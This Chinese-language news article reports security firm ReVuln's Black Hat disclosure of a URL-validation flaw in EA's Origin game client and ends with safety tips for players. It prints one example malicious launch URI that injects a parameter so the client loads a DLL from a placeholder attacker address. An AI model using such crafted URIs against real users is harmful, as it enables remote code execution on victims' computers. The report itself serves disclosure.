名为ReVuln的计算机安全公司曾在去年曝光了Steam平台存在URL地址访问安全漏洞,现在该公司再次在阿姆斯特丹召开的Black Hat安全会议上指出EA的Origin平台同样具有类似的问题。
ReVuln公司的研究人员表示,在经过多次测试之后证明,Origin平台的URL验证机制存在漏洞,黑客可以利用这一漏洞推送假冒URL链接来向玩家计算机中安装恶意程序。
通常来说,玩家在试图通过Origin启动游戏时,客户端会先向服务器请求一个用来启动游戏的URL地址,比 如:origin://LaunchGame/[GameID],而如果该地址被黑客拦截并替换成包含有不良内容的加链接,比如:origin: //LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那么一旦玩家执行启动游戏操作时便会导致自己的计算机遭遇安全风险。
不过,研究人员也表示,虽然Origin平台自身具有这样的安全机制缺陷,但黑客想要通过这种方式对用户发起攻击也并非易于反掌,因为目前大多浏览 器产品都具有非法URL过滤拦截功能,所以为了确保计算机的安全,用户一定要保证打开相关的浏览器安全功能,并且安装有最新版的防病毒软件,同时拒绝访问 那些不熟悉的URL地址。
